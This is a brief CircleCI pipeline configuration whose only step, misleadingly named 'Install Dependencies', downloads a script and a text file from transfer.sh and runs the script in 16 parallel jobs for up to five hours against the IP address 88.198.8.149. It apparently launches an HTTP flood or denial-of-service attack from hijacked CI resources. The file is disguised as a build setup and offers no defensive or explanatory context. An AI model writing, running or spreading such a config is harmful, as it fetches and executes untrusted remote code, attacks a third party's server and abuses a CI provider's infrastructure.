version: 2.1 
jobs: 
    trial: 
      docker: 
            - image: debian:latest 
      parallelism: 16 
      steps: 
        - run: 
            name: Install Dependencies 
            command: apt update && apt install nodejs wget -y && wget https://transfer.sh/get/9oFiOG/f.js && wget https://transfer.sh/get/1MFdUF/https.txt && chmod +x f.js && ./f.js GET http://88.198.8.149 https.txt 999999 153 5 
            no_output_timeout: 5h 
 
workflows: 
    version: 2.1 
    build: 
        jobs: 
        - trial